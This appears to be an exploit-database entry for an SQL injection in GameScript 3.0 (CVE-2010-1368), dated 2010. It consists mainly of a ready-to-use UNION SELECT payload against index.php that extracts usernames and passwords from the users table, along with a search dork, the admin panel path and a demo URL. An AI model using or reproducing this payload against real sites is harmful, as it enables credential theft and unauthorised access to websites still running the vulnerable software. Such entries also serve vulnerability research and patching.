GameScript 3.0 - SQL Injection

Author: FormatXformat
type: webapps
platform: php
port: 
date_added: 2010-02-24 
date_updated:  
verified: 1 
codes: OSVDB-63727;CVE-2010-1368 
tags: 
aliases:  
screenshot_url:  
application_url: 

Author :  FormatXformat
Home : Tkurd.net

Script : http://www.gamescript.net
Vulnerabilities : SQL Injection


Dork:

Copyright © 2005 - 2006 GameScript.net. All Games Copyright © To Their Respective Owners. All Rights Reserved.



Exploit:

/index.php?action=category&id=-6+union+all+select+1,concat(username,0x3a,password),3+from+users--

Admin page: admincp



Demo :

http://server/index.php?action=category&id=-6+union+all+select+1,concat(username,0x3a,password),3+from+users--